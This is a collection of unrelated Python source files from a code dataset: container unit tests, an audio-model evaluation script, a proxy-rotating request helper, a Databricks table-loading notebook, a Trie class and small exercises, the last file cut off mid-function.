print('No')\n\nprint(allclases)\nprint(md)\nprint(md2)\n############################################################","sub_path":"newStepic/step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"120331004","text":"\nimport unittest\nfrom core.dockerutils import OwtfContainer\nfrom core.dockerutils.dclient import *\n\nTEST_CONTAINER_PATH = '../containers/testcontainer'\n\nclass OwtfContainerTest(unittest.TestCase):\n\n # def setUp(self):\n # oc = OwtfContainer('../core/containers/testcontainer')\n # if oc.image_id in [i['Id'] for i in cli.images()]:\n # oc.remove_image()\n #\n # if oc.container_id in [i['Id'] for i in cli.containers(all=True)]:\n # oc.remove_container()\n #\n def tearDown(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if oc.image_id in [i['Id'] for i in cli.images()]:\n oc.remove_image()\n\n if oc.container_id in [i['Id'] for i in cli.containers(all=True)]:\n oc.remove_container()\n\n def test_not_valid_false(self):\n oc = OwtfContainer('../core/containers/testcontainers')\n self.assertFalse(oc.is_valid)\n\n def test_validate_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n\n def test_buildingimage_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.image_id in [i['Id'] for i in cli.images()])\n\n def test_removeimage_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.remove_image()\n self.assertFalse(oc.is_image_build)\n self.assertFalse(oc.image_id in [i['Id'] for i in cli.images()])\n\n def test_buildcontainer_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if oc.is_running and oc.is_container_build:\n oc.stop()\n self.assertFalse(oc.is_running)\n oc.remove_container()\n self.assertFalse(oc.is_container_build)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.build_container()\n self.assertTrue(oc.is_container_build)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers(all=True)])\n\n def test_removecontainer_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if not oc.is_container_build:\n oc.build_image()\n oc.build_container()\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.is_container_build)\n oc.remove_container()\n self.assertFalse(oc.is_container_build)\n self.assertFalse(oc.container_id in [i['Id'] for i in cli.containers(all=True)])\n\n def test_startcommandsstop_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.build_container()\n self.assertTrue(oc.is_container_build)\n oc.start()\n self.assertTrue(oc.is_running)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers()])\n commands = '[{\"code\": \"666\", \"noise\": \"passive\", \"command\": \"sleep 5s\", \"target\": \"\", \"description\": \"Test\"}]'\n self.assertEqual(oc.get_available_commands(), commands)\n oc.stop()\n self.assertFalse(oc.container_id in [i['Id'] for i in cli.containers()])\n self.assertFalse(oc.is_running)\n\n def test_running_container(self):\n oc1 = OwtfContainer(TEST_CONTAINER_PATH)\n oc1.build_image()\n oc1.build_container()\n oc1.start()\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.is_container_build)\n self.assertTrue(oc.is_running)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers()])\n\nif __name__ == '__main__':\n 
unittest.main()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_owtfcontainer.py","file_name":"test_owtfcontainer.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539524328","text":"import os\nimport json\nimport glob\nimport numpy as np\nimport torch\nimport tqdm\nfrom src.data.inmemory_lmdb_dataset import InMemorySpectrogramDataset\nfrom src.data.utils import _collate_fn, _collate_fn_multiclass\nfrom torch.utils.data import DataLoader\nfrom src.data.transforms import get_transforms_v2\nfrom src.models.gise_mixtures_lightning import GISEMixtures_Lightning\nfrom src.utilities.metrics_helper import calculate_stats, d_prime\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--ckpt_path\", type=str,\n help=\"path to model .ckpt\")\nparser.add_argument(\"--lbl_map\", type=str,\n help=\"path to label map .json file\")\nparser.add_argument(\"--lmdb_path\")\nparser.add_argument(\"--exp_dir\", type=str, default=None)\nparser.add_argument(\"--results_csv\", type=str, default='results.csv')\nparser.add_argument(\"--overlap_analysis\", action=\"store_true\")\nparser.add_argument(\"--export_weights\", action=\"store_true\")\nparser.add_argument(\"--export_dir\", type=str)\n\n\ndef eval_model(ckpt_path, val_tfs, overlap_analysis=False, export_weights=False, export_dir=None):\n # print(ckpt_path.split(\"/\"))\n splitted = ckpt_path.split(\"/\")\n print(splitted)\n # print(splitted[-4], splitted[-3])\n sub_dir = os.path.join(export_dir, splitted[-4], splitted[-3])\n # print(sub_dir)\n model_spec = \"/\".join([splitted[-6], splitted[-4],splitted[-3]])\n\n print(\"model_spec:\", model_spec)\n ckpt_ext = \"/\".join(ckpt_path.split(\"/\")[-6:])\n print(ckpt_ext)\n # print(\"Model: {}\".format(model_spec))\n model = GISEMixtures_Lightning.load_from_checkpoint(ckpt_path)\n model = model.cuda().eval()\n\n test_set = InMemorySpectrogramDataset(args.lmdb_path, args.lbl_map,\n model.hparams.cfg['audio_config'],\n transform=val_tfs, is_val=True)\n data_loader = DataLoader(test_set, num_workers=8, batch_size=128,\n shuffle=False, collate_fn=_collate_fn)\n test_predictions = []\n test_gts = []\n for batch in tqdm.tqdm(data_loader):\n x, _, y = batch\n x = x.cuda()\n with torch.no_grad():\n y_pred = model(x)\n sigmoid_preds = torch.sigmoid(y_pred)\n test_predictions.append(sigmoid_preds.detach().cpu())\n test_gts.append(y.detach().cpu())\n test_predictions = torch.cat(test_predictions, 0).numpy()\n test_gts = torch.cat(test_gts, 0).numpy()\n if overlap_analysis:\n with open(\"./metadata/overlapping_indices.json\", 'r') as fd:\n indices = json.load(fd)\n else:\n indices = None\n stats = calculate_stats(test_predictions, test_gts, class_indices=indices)\n mAP = np.mean([stat['AP'] for stat in stats])\n mAUC = np.mean([stat['auc'] for stat in stats])\n if export_weights:\n num_classes = model.hparams.cfg['model']['num_classes']\n splitted = ckpt_path.split(\"/\")\n sub_dir = os.path.join(export_dir, splitted[-4], splitted[-3])\n if not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n pth_path = os.path.join(sub_dir,\n \"mAP={:.4f}_dprime={:.4f}_num_classes={}.pth\".format(mAP, d_prime(mAUC), num_classes)\n )\n model.export_state_dict(pth_path)\n # print(\"mAP: {:.6f}\".format(mAP))\n # print(\"mAUC: {:.6f}\".format(mAUC))\n # print(\"dprime: {:.6f}\".format(d_prime(mAUC)))\n return {\n \"name\": model_spec,\n \"run\": splitted[-6],\n \"train_set\": splitted[-3],\n \"ckpt_ext\": ckpt_ext,\n \"mAP\": mAP, \"mAUC\": mAUC, \"dprime\": d_prime(mAUC)\n }\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n # model = FSD50kMixtures_Lightning.load_from_checkpoint(args.ckpt_path)\n # model = model.cuda().eval()\n val_tfs = 
get_transforms_v2(False, 501)\n if args.exp_dir is None:\n print(eval_model(args.ckpt_path, val_tfs))\n else:\n # mixup / efficientnet - b1_lmdb_adam_64_adam / train_p2\n ckpts = glob.glob(os.path.join(args.exp_dir, \"*\", \"*\", \"*\", \"ckpts\", \"*.ckpt\"))\n # print(\"num ckpts:\", len(ckpts))\n results = []\n fd = open(args.results_csv, \"w\")\n fd.writelines(\"Model,run,train_set,mAP,mAUC,dprime,ckpt_path\\n\")\n for f in ckpts:\n res = eval_model(f, val_tfs, args.overlap_analysis, args.export_weights, args.export_dir)\n line = \"{},{},{},{},{},{},{}\\n\".format(res['name'], res['run'], res['train_set'],\n res['mAP'],\n res['mAUC'], res['dprime'],\n res['ckpt_ext'])\n results.append(line)\n fd.writelines(line)\n fd.close()\n print(\"Results written to: \", args.results_csv)\n","sub_path":"eval_all_mixtures.py","file_name":"eval_all_mixtures.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
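The d_prime reported above is, by the usual audio-tagging convention, obtained from AUC through the inverse normal CDF; a sketch assuming the metrics helper follows that convention:

import numpy as np
from scipy import stats

def d_prime_from_auc(auc: float) -> float:
    return stats.norm.ppf(auc) * np.sqrt(2)

print(round(d_prime_from_auc(0.95), 3))  # 2.326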
+{"seq_id":"378137806","text":"from __future__ import division, print_function\nfrom __future__ import absolute_import\nfrom . import proxy_handling\nimport six.moves.urllib.request, six.moves.urllib.error, six.moves.urllib.parse\nimport threading\nimport re\n\n# Try to send request through a TOR\n# try:\n# import socks # SocksiPy module\n# import socket\n# SOCKS_PORT = 9150 # 9050\n# def create_connection(address, timeout=None, source_address=None):\n# sock = socks.socksocket()\n# sock.connect(address)\n# return sock\n# socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", SOCKS_PORT)\n# socket.socket = socks.socksocket\n# socket.create_connection = create_connection\n# print(\"WITH PROXY\")\n# except:\n# pass\n\nimport socket\n# import urllib\nimport math\nfrom .logger import logger\nfrom six.moves import range\n\n\ndef y2lat(y):\n return (2 * math.atan(math.exp(y / 6378137)) - math.pi / 2) / (math.pi / 180)\n\n\ndef x2lon(x):\n return x / (math.pi / 180.0) / 6378137.0\n\n\ndef xy2lonlat(x, y):\n return [x2lon(x), y2lat(y)]\n\n\n# REFERER = 'https://www.google.com/'\n# USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n\nREFERER = 'http://gis-lab.info/forum/viewtopic.php?t=25520'\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0'\nDEFAULT_TIMEOUT = 60\n\nclass TimeoutException(Exception):\n pass\n\n\ndef make_request(url, with_proxy=False, timeout=DEFAULT_TIMEOUT):\n # original function\n if url:\n #url = url.encode('utf-8')\n logger.debug(url)\n if with_proxy:\n return make_request_with_proxy(url, timeout=timeout)\n try:\n headers = {\n 'Referer': REFERER, \n 'User-Agent': USER_AGENT,\n 'Upgrade-Insecure-Requests': 1\n }\n req = six.moves.urllib.request.Request(url, headers=headers)\n f = six.moves.urllib.request.urlopen(req, timeout=timeout)\n read = f.read()\n return read\n except Exception as er:\n logger.warning(er)\n raise TimeoutException()\n return False\n\n\ndef make_request_with_proxy(url, timeout=DEFAULT_TIMEOUT):\n proxies = proxy_handling.load_proxies()\n if not proxies:\n proxy_handling.update_proxies()\n proxies = proxy_handling.load_proxies_from_file()\n tries = 1 # number of tries for each proxy\n for proxy in reversed(proxies):\n for i in range(1, tries+1): # how many tries for each proxy\n try:\n # print('%i iteration of proxy %s' % (i, proxy), end=\"\")\n proxy_handler = six.moves.urllib.request.ProxyHandler({'http': proxy, 'https': proxy})\n opener = six.moves.urllib.request.build_opener(proxy_handler)\n six.moves.urllib.request.install_opener(opener)\n headers = {\n 'Referer': REFERER,\n 'User-Agent': USER_AGENT,\n 'Upgrade-Insecure-Requests': 1\n }\n request = six.moves.urllib.request.Request(url, headers=headers)\n f = six.moves.urllib.request.urlopen(request, timeout=timeout)\n read = f.read()\n if read.find('400 Bad Request') == -1:\n return read\n except Exception as er:\n logger.warning(er)\n if i == tries:\n proxies.remove(proxy)\n proxy_handling.dump_proxies_to_file(proxies)\n\n # if here, the result is not received\n # try with the new proxy list\n return make_request_with_proxy(url)\n\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33854009","text":"'''Написать программу, которая генерирует в указанных пользователем границах:\na. случайное целое число,\nb. случайное вещественное число,\nc. случайный символ.\nДля каждого из трех случаев пользователь задает свои границы диапазона. Например,\n если надо получить случайный символ от 'a' до 'f', то вводятся эти символы. Программа\n должна вывести на экран любой символ алфавита от 'a' до 'f' включительно.'''\n\nimport random\n\nnum_1,num_2 = map(int,input('Введите диапазон чисел для выбора целого числа -->').split())\nreal_num_1, real_num_2 = map(int,input('Введите диапазон чисел для выбора вещественного числа -->').split())\nletter_1,letter_2 = map(str,input('Введите диапазон для выбора буквы (s z) -->').split())\n\nnum_2,real_num_2 = num_2 +1, real_num_2 + 1\nletter_1,letter_2 = ord(letter_1), ord(letter_2) + 1\nnumber = random.randint(num_1,num_2)\nreal_number = random.uniform(real_num_1, real_num_2)\nletter = chr(random.randint(letter_1, letter_2))\n\nprint(f'целое число: {number}\\nвещественное число: {real_number}\\nбуква: {letter}')","sub_path":"algorithms_and_data_structure/Lesson_1/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"245899367","text":"# Databricks notebook source\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\ndbutils.widgets.text(\"deltaTS\", \"\", \"\")\ndbutils.widgets.text(\"initFlg\", \"\", \"\")\n\ndeltaTS = dbutils.widgets.get(\"deltaTS\")\ninitFlg = dbutils.widgets.get(\"initFlg\")\nschmNm = dbutils.widgets.get(\"schmNm\")\ntblNm = dbutils.widgets.get(\"tblNm\")\n\n# Update the Timestamp to remove T\ndeltaTS = deltaTS.replace('T',' ')\n\n# COMMAND ----------\n\nif initFlg == \"X\" :\n dltaPath = \"/mnt/entadls/published/eim/managed/csc/DimSeason\"\n dbutils.fs.rm(dltaPath ,True)\n dropPermTable = \"DROP TABLE IF EXISTS {0}.{1}\".format(schmNm, tblNm)\n spark.sql(dropPermTable)\nif initFlg == \"Y\" :\n truncTable = \"DELETE FROM {0}.{1}\".format(schmNm, tblNm)\n spark.sql(truncTable)\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC CREATE DATABASE IF NOT EXISTS csc\n# MAGIC location '/mnt/entadls/published/eim/managed/csc';\n# MAGIC CREATE TABLE IF NOT EXISTS csc.DimSeason\n# MAGIC (\n# MAGIC DimSeasonKey int,\n# MAGIC SeasonCode string,\n# MAGIC SortNumber int,\n# MAGIC YearNumber int,\n# MAGIC SeasonCodePrefix string,\n# MAGIC SeasonCodeSuffix string,\n# MAGIC EDW_CRT_TS timestamp,\n# MAGIC EDW_UPDT_TS timestamp, \n# MAGIC EDW_HASH_CHK string,\n# MAGIC EDW_ACTV_FLG string\n# MAGIC )\n# MAGIC USING DELTA\n# MAGIC -- PARTITIONED BY (DOC_YR_NBR)\n# MAGIC LOCATION \"/mnt/entadls/published/eim/managed/csc/DimSeason\"\n\n# COMMAND ----------\n\ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_read\", 120, {\"schemaNm\": \"ENTPR_FOUNDATION_VIEW\", \"tableNm\": \"SEAS_CNV\", \"notebookNm\": \"SEAS_CNV\"})\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE OR REPLACE TEMP VIEW DimSeasontemp\n# MAGIC AS\n# MAGIC select \n# MAGIC -1 AS DimSeasonKey ,\n# MAGIC SEAS_CD AS SeasonCode ,\n# MAGIC SEAS_SORT_NBR AS SortNumber ,\n# MAGIC SEAS_YR_NBR AS YearNumber ,\n# MAGIC SEAS_CD_FRST_LTR AS SeasonCodePrefix ,\n# MAGIC SEAS_SHRT_YR_CD AS SeasonCodeSuffix ,\n# MAGIC CURRENT_TIMESTAMP AS EDW_CRT_TS ,\n# MAGIC CURRENT_TIMESTAMP AS EDW_UPDT_TS ,\n# MAGIC CAST(NULL AS STRING) AS EDW_HASH_CHK ,\n# MAGIC 'Y' AS EDW_ACTV_FLG\n# MAGIC from global_temp.gbl_SEAS_CNV_SEAS_CNV\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC DROP VIEW IF EXISTS global_temp.DimSeason\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW DimSeason\n# MAGIC AS\n# MAGIC select * from DimSeasontemp\n\n# COMMAND ----------\n\n#all those notebooks that should write to Azure datawarehouse should include the below code.\n#schemaNm = landing schema in Azure datawarehouse.Schema will gets created if not exists. Naming Standard: DatabaseName_LND \n#Ex: ENTPR_PRODUCT_LND, ENTPR_CUSTOMER_LND, ENTPR_RETAIL_LND..\n#tableNm = This is the datawarehouse table name \n#dbrxTable = This is the databricks global table name\n# To view the processing of this reusable notebook, click on the notebook job(below in blue) while or after execution. 
\ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write\", 120, {\"schemaNm\": \"CSC_LND\", \"tableNm\": \"DimSeason\", \"dbrxTable\": \"DimSeason\", \"writeMode\": \"overwrite\"})\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC MERGE INTO CSC.DimSeason tgt\n# MAGIC USING global_temp.DimSeason src\n# MAGIC ON tgt.SeasonCode = src.SeasonCode\n# MAGIC WHEN MATCHED THEN\n# MAGIC UPDATE SET\n# MAGIC tgt.DimSeasonKey = src.DimSeasonKey\n# MAGIC ,tgt.SortNumber = src.SortNumber \n# MAGIC ,tgt.YearNumber = src.YearNumber \n# MAGIC ,tgt.SeasonCodePrefix = src.SeasonCodePrefix \n# MAGIC ,tgt.SeasonCodeSuffix = src.SeasonCodeSuffix \n# MAGIC ,tgt.EDW_CRT_TS = src.EDW_CRT_TS \n# MAGIC ,tgt.EDW_UPDT_TS = CURRENT_TIMESTAMP \n# MAGIC ,tgt.EDW_HASH_CHK = src.EDW_HASH_CHK \n# MAGIC ,tgt.EDW_ACTV_FLG = src.EDW_ACTV_FLG\n# MAGIC WHEN NOT MATCHED \n# MAGIC THEN INSERT\n# MAGIC (\n# MAGIC DimSeasonKey \n# MAGIC ,SeasonCode \n# MAGIC ,SortNumber \n# MAGIC ,YearNumber \n# MAGIC ,SeasonCodePrefix \n# MAGIC ,SeasonCodeSuffix \n# MAGIC ,EDW_CRT_TS \n# MAGIC ,EDW_UPDT_TS \n# MAGIC ,EDW_HASH_CHK \n# MAGIC ,EDW_ACTV_FLG\n# MAGIC )\n# MAGIC VALUES\n# MAGIC (\n# MAGIC src.DimSeasonKey \n# MAGIC ,src.SeasonCode \n# MAGIC ,src.SortNumber \n# MAGIC ,src.YearNumber \n# MAGIC ,src.SeasonCodePrefix \n# MAGIC ,src.SeasonCodeSuffix \n# MAGIC ,current_timestamp \n# MAGIC ,current_timestamp \n# MAGIC ,src.EDW_HASH_CHK \n# MAGIC ,src.EDW_ACTV_FLG\n# MAGIC );\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC OPTIMIZE CSC.DimSeason ; \n# MAGIC VACUUM CSC.DimSeason RETAIN 168 HOURS;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS CSC_VIEW;\n# MAGIC CREATE OR REPLACE VIEW CSC_VIEW.DimSeason \n# MAGIC AS\n# MAGIC SELECT\n# MAGIC DimSeasonKey \n# MAGIC ,SeasonCode \n# MAGIC ,SortNumber \n# MAGIC ,YearNumber \n# MAGIC ,SeasonCodePrefix \n# MAGIC ,SeasonCodeSuffix \n# MAGIC ,EDW_CRT_TS \n# MAGIC ,EDW_UPDT_TS \n# MAGIC ,EDW_HASH_CHK \n# MAGIC ,EDW_ACTV_FLG\n# MAGIC FROM CSC.DimSeason\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC DROP VIEW IF EXISTS global_temp.gbl_SEAS_CNV_SEAS_CNV ;\n# MAGIC DROP VIEW IF EXISTS global_temp.DimSeason ;\n","sub_path":"Prod/csc/dimseason.py","file_name":"dimseason.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"448709036","text":"__author__ = 'Stephen'\n\n\nclass Trie:\n \"\"\"A linked implementation of a non-linear tree data structure used to store words. Also known as a prefix tree.\n \"\"\"\n def __init__(self):\n self.root = Node(None)\n\n def __contains__(self, item):\n \"\"\"Tests whether this Trie contains the given item. Has efficiency of O(k) where k is the length of the given\n word.\n :param item: The item to check for inclusion in this trie\n :return: True if the item is contained in this trie\n \"\"\"\n walker = self.root\n i = 0\n while i < len(item) and item[i] in walker: # each character in the given word is the key for the next branch\n walker = walker[item[i]] # keep walking so long as the key is present\n i += 1\n return not (i < len(item)) # if i didn't make it to the length of the given word then the word was not found\n\n def next(self):\n \"\"\"Generator function that returns all complete words from this trie\n \"\"\"\n for terminal in self.root.terminals():\n yield terminal\n\n def find(self, prefix):\n \"\"\"Finds and returns the node corresponding to the given prefix if it is present in this trie.\n :param prefix: The prefix to search for.\n :return: The node representing the given prefix in this trie. Returns None if the prefix was not found.\n \"\"\"\n walker = self.root\n i = 0\n while i < len(prefix): # walk Trie to find the node that contains the prefix\n if prefix[i] not in walker: # return None if prefix not found\n return None\n walker = walker[prefix[i]]\n i += 1\n return walker\n\n def add(self, item):\n \"\"\"Adds the given item to this Trie.\n :param item: The item to be added\n \"\"\"\n self.root.add(item)\n\n\nclass Node:\n \"\"\"Each node in a trie stores a dict of children nodes. The keys in this dict determine the letter associated with\n that branch. A collection of branches is what makes up a word. A node is marked as terminal if all previous branches\n constitute a complete word.\n \"\"\"\n def __init__(self, parent):\n self.parent = parent\n self.children = {}\n self.terminal = False\n\n def __contains__(self, item):\n if len(item) is 1:\n return item in self.children\n else:\n if item[0] in self:\n return item[1:] in self[item[0]]\n else:\n return False\n\n def __getitem__(self, item):\n return self.children[item]\n\n def terminals(self, prefix=\"\"):\n \"\"\"Yields this node's 'terminal' child nodes. A terminal node is one whose prefix is marked as significant. In\n the case of strings this generally means the combination of keys / paths leading to a significant node\n represents a whole word.\n :param prefix: The in order sequence of keys associated with this node's ancestors. Required because it is more\n efficient to pass the prefixes downstream than to retrieve them on each iteration.\n \"\"\"\n if self.terminal:\n yield prefix\n for key, child in self.children.items():\n for terminal in child.terminals(prefix + key):\n yield terminal\n\n def add(self, item):\n \"\"\"Adds the given item to this node. 
This node will add the first character of the item as a child in its dict.\n That child will then contain the second character in the item and so on.\n :param item: The item to add to this node\n \"\"\"\n if len(item) is 0: # if all parts have already been added by ancestors...\n self.terminal = True # this node must be terminal\n else:\n part = item[0]\n if part not in self.children:\n self.children.update({part: Node(self)}) # add first part to children dictionary\n self[part].add(item[1:]) # pass remaining parts to child\n","sub_path":"Assignment2/WordLadder/Trie.py","file_name":"Trie.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
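A usage sketch for the Trie above; note that `in` tests whether the prefix path exists, not whether the word is terminal:

t = Trie()
for word in ("car", "card", "care", "dog"):
    t.add(word)

print("car" in t)                      # True
print("ca" in t)                       # also True: the prefix path exists
print(sorted(t.next()))                # ['car', 'card', 'care', 'dog']
node = t.find("car")
print(sorted(node.terminals("car")))   # ['car', 'card', 'care']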
+{"seq_id":"467701692","text":"# Грузовику с посылкой нужно доставить груз из пункта Казани в пункт Крым.\r\n# В Крыму,как гористой местности, имеется много дорог, каждая из которых\r\n# проходит через несколько туннелей.\r\n\r\n# Программа выводит оптимальный путь и максимальную высоту,\r\n# которую может иметь грузовик, чтобы проехать сквозь туннель и не застрять.\r\nnumber_of_roads = int(input('Сколько имеется дорог:'))\r\nchosen_road = 0\r\nchosen_height = 0\r\nmin_height = 0\r\nfor road_counter in range(1, number_of_roads + 1):\r\n size_of_road = int(input('Через сколько туннелей проходит путь:'))\r\n if 0 == chosen_road:\r\n chosen_road = road_counter\r\n min_height = 0\r\n for tunnel_counter in range(size_of_road):\r\n tunnel_height = int(input('H туннеля:'))\r\n if 0 == min_height:\r\n min_height = tunnel_height\r\n if min_height > tunnel_height:\r\n min_height = tunnel_height\r\n print('---', chosen_road, chosen_height, min_height)\r\n if 0 == chosen_height:\r\n chosen_height = min_height\r\n continue\r\n if chosen_height < min_height:\r\n chosen_height = min_height\r\n chosen_road = road_counter\r\nprint(chosen_road, chosen_height)\r\n","sub_path":"Основы программирования Python/8. Nested Loops/Грузовик в Крыму — трассировка.py","file_name":"Грузовик в Крыму — трассировка.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"618283260","text":"import os\nimport sys\nimport re\nimport glob\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom XmlHandler import XmlHandler\nfrom dateutil.rrule import DAILY, rrule, MO, TU, WE, TH, FR\n\nMKT_DICT = {\n\t\"HKEX\": \"HK\",\n\t\"HKSSE\": \"C1\",\n\t\"HKSZSE\": \"C2\",\n}\n\nCONST_DIC = {\n\t\"cur_dt\": \"\",\n\t\"cln_detail_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\ClientDetails_????????.xlsx\",\n\t\"msse_bal_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Balance (PB) ????????.xls\",\n\t\"mssd_bal_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Balance (PB) ????????.xls\",\n\t\"mssd_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Trade (PB) ????????.xls\",\n\t\"msse_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Trade (PB) ????????.xls\",\n\t\"msseo_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE EO Daily Trade (PB) ????????.xls\",\n\t\"msse_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Position (PB) ????????.xls\",\n\t\"msse_trans_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Fund Movement (PB) ????????.xls\",\n\t\"msseo_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE EO Daily Position (PB) ????????.xls\",\n\t\"mssd_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Position (PB) ????????.xls\",\n\t\"os_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\OS_Trades_Extract_????.CSV\",\n\t\"pd_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Pending_Trades_Extract_????.CSV\",\n\t\"stk_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Stock_Extract_????.CSV\",\n\t\"fx_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\EX_Rate_Extract_????.CSV\",\n\t\"client_report_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\config\\pb_client_account.xlsx\",\n\t\"exposure_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Exposure_Reporting ????????.xml\",\n\t\"consol_data_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\data\\daily_????????.xlsx\",\n\t\"trd_dt_range\": 99,\n\t\"setl_dt_range\": 4,\n}\n\nG1_MKT_DICT= {\n\t\"HKD\": \"HKEX\",\n}\n\ndef xlsx_to_df(input_file, sheet=0, na=0, dtype={}):\n\tdf = pd.read_excel(input_file, sheetname=sheet, dtype=dtype)\n\tdf.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& :]\", \"\", c) for c in df.columns]\n\tdf = df.fillna(na)\n\treturn df\n\ndef import_client():\n\tif CONST_DIC[\"cur_dt\"] == \"\":\n\t\tmsse_trd_file = max(glob.iglob(CONST_DIC[\"msse_trd_path\"]))\n\t\tCONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(msse_trd_file[-12:-4], \"%Y%m%d\")\n\n\t# CONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(input_file[-13:-5], \"%Y%m%d\")\n\n\tinput_file = CONST_DIC[\"client_report_file\"]\n\tprint (input_file)\n\n\treturn xlsx_to_df(input_file)\n\ndef import_trd(client_df):\n\tmsse_trd_file = CONST_DIC[\"msse_trd_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tmsse_trans_file = 
